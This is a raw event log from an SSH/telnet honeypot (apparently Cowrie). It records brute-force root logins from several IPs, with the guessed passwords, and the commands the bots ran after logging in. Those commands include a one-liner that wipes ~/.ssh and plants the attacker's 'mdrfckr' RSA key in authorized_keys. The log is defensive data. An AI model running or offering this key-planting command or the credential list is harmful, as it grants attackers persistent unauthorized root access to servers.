{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:14:33.496526Z","src_ip":"51.81.118.153","session":"887668689a01"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:14:33.499847Z","src_ip":"152.32.190.168","session":"0f6995fbc53a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:14:33.593982Z","src_ip":"51.81.118.153","session":"887668689a01"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:33.594863Z","src_ip":"51.81.118.153","session":"887668689a01"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":36076,"dst_ip":"1.2.3.4","dst_port":22,"session":"4673735ef8e7","protocol":"ssh","message":"New connection: 51.81.118.153:36076 (1.2.3.4:22) [session: 4673735ef8e7]","sensor":"my-vps","timestamp":"2025-09-09T04:14:33.686555Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:14:33.687497Z","src_ip":"51.81.118.153","session":"4673735ef8e7"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:33.697587Z","src_ip":"152.32.190.168","session":"aa88c2aa8d86"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:33.698519Z","src_ip":"152.32.190.168","session":"0f6995fbc53a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:14:33.783385Z","src_ip":"51.81.118.153","session":"4673735ef8e7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:14:34.212927Z","src_ip":"51.81.118.153","session":"4673735ef8e7"}
{"eventid":"cowrie.session.closed","duration":13.369514465332031,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:34.427030Z","src_ip":"212.227.125.160","session":"2c42420f1a42"}
{"eventid":"cowrie.session.closed","duration":13.80004334449768,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:35.183915Z","src_ip":"212.227.125.160","session":"2bb021b5b975"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:35.310600Z","src_ip":"51.81.118.153","session":"4673735ef8e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46195,"dst_ip":"1.2.3.4","dst_port":23,"session":"448dd6f9b240","protocol":"telnet","message":"New connection: 212.227.125.160:46195 (1.2.3.4:23) [session: 448dd6f9b240]","sensor":"my-vps","timestamp":"2025-09-09T04:14:35.378934Z"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":36090,"dst_ip":"1.2.3.4","dst_port":22,"session":"43c9a1fcde03","protocol":"ssh","message":"New connection: 51.81.118.153:36090 (1.2.3.4:22) [session: 43c9a1fcde03]","sensor":"my-vps","timestamp":"2025-09-09T04:14:35.406261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:14:35.407134Z","src_ip":"51.81.118.153","session":"43c9a1fcde03"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:14:35.503567Z","src_ip":"51.81.118.153","session":"43c9a1fcde03"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:14:35.936667Z","src_ip":"51.81.118.153","session":"43c9a1fcde03"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:36.034369Z","src_ip":"51.81.118.153","session":"43c9a1fcde03"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:36.035418Z","src_ip":"51.81.118.153","session":"887668689a01"}
{"eventid":"cowrie.session.connect","src_ip":"102.68.86.62","src_port":55702,"dst_ip":"1.2.3.4","dst_port":22,"session":"5fb2a5587857","protocol":"ssh","message":"New connection: 102.68.86.62:55702 (1.2.3.4:22) [session: 5fb2a5587857]","sensor":"my-vps","timestamp":"2025-09-09T04:14:38.030694Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:14:38.032089Z","src_ip":"102.68.86.62","session":"5fb2a5587857"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:14:38.202922Z","src_ip":"102.68.86.62","session":"5fb2a5587857"}
{"eventid":"cowrie.login.success","username":"root","password":"Root12345","message":"login attempt [root/Root12345] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:14:38.925717Z","src_ip":"102.68.86.62","session":"5fb2a5587857"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:14:39.329398Z","src_ip":"102.68.86.62","session":"5fb2a5587857"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:14:39.330127Z","src_ip":"102.68.86.62","session":"5fb2a5587857"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:14:39.331192Z","src_ip":"102.68.86.62","session":"5fb2a5587857"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:39.501966Z","src_ip":"102.68.86.62","session":"5fb2a5587857"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:14:39.867671Z","src_ip":"102.68.86.62","session":"5fb2a5587857"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:14:39.868948Z","src_ip":"102.68.86.62","session":"5fb2a5587857"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:14:40.056558Z","src_ip":"102.68.86.62","session":"5fb2a5587857"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:40.057493Z","src_ip":"102.68.86.62","session":"5fb2a5587857"}
{"eventid":"cowrie.session.connect","src_ip":"102.68.86.62","src_port":55714,"dst_ip":"1.2.3.4","dst_port":22,"session":"167f37b63112","protocol":"ssh","message":"New connection: 102.68.86.62:55714 (1.2.3.4:22) [session: 167f37b63112]","sensor":"my-vps","timestamp":"2025-09-09T04:14:43.255326Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:14:43.256498Z","src_ip":"102.68.86.62","session":"167f37b63112"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:14:43.424984Z","src_ip":"102.68.86.62","session":"167f37b63112"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:14:44.140696Z","src_ip":"102.68.86.62","session":"167f37b63112"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:45.311737Z","src_ip":"102.68.86.62","session":"167f37b63112"}
{"eventid":"cowrie.session.connect","src_ip":"102.68.86.62","src_port":48760,"dst_ip":"1.2.3.4","dst_port":22,"session":"378883821c8e","protocol":"ssh","message":"New connection: 102.68.86.62:48760 (1.2.3.4:22) [session: 378883821c8e]","sensor":"my-vps","timestamp":"2025-09-09T04:14:45.479279Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:14:45.480217Z","src_ip":"102.68.86.62","session":"378883821c8e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:14:45.648405Z","src_ip":"102.68.86.62","session":"378883821c8e"}
{"eventid":"cowrie.session.closed","duration":13.674971580505371,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:46.063811Z","src_ip":"212.227.125.160","session":"7a7dae6c1e16"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46374,"dst_ip":"1.2.3.4","dst_port":23,"session":"14fbbaa0d327","protocol":"telnet","message":"New connection: 212.227.125.160:46374 (1.2.3.4:23) [session: 14fbbaa0d327]","sensor":"my-vps","timestamp":"2025-09-09T04:14:46.311812Z"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:14:46.365936Z","src_ip":"102.68.86.62","session":"378883821c8e"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:46.535938Z","src_ip":"102.68.86.62","session":"378883821c8e"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:46.537163Z","src_ip":"102.68.86.62","session":"5fb2a5587857"}
{"eventid":"cowrie.session.closed","duration":13.790004253387451,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:47.039898Z","src_ip":"212.227.125.160","session":"0e3f8d2518f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46435,"dst_ip":"1.2.3.4","dst_port":23,"session":"7da4352a1723","protocol":"telnet","message":"New connection: 212.227.125.160:46435 (1.2.3.4:23) [session: 7da4352a1723]","sensor":"my-vps","timestamp":"2025-09-09T04:14:47.260344Z"}
{"eventid":"cowrie.session.closed","duration":13.825175046920776,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:49.203360Z","src_ip":"212.227.125.160","session":"448dd6f9b240"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46495,"dst_ip":"1.2.3.4","dst_port":23,"session":"a95979ec8eb7","protocol":"telnet","message":"New connection: 212.227.125.160:46495 (1.2.3.4:23) [session: a95979ec8eb7]","sensor":"my-vps","timestamp":"2025-09-09T04:14:49.381113Z"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":49852,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef7abf972359","protocol":"ssh","message":"New connection: 211.22.25.164:49852 (1.2.3.4:22) [session: ef7abf972359]","sensor":"my-vps","timestamp":"2025-09-09T04:14:52.739598Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:14:52.740330Z","src_ip":"211.22.25.164","session":"ef7abf972359"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:14:52.980274Z","src_ip":"211.22.25.164","session":"ef7abf972359"}
{"eventid":"cowrie.login.success","username":"root","password":"A1234567!","message":"login attempt [root/A1234567!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:14:53.980063Z","src_ip":"211.22.25.164","session":"ef7abf972359"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:14:54.507994Z","src_ip":"211.22.25.164","session":"ef7abf972359"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:14:54.508684Z","src_ip":"211.22.25.164","session":"ef7abf972359"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:14:54.509691Z","src_ip":"211.22.25.164","session":"ef7abf972359"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:14:54.750479Z","src_ip":"211.22.25.164","session":"ef7abf972359"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:14:55.285630Z","src_ip":"211.22.25.164","session":"ef7abf972359"}
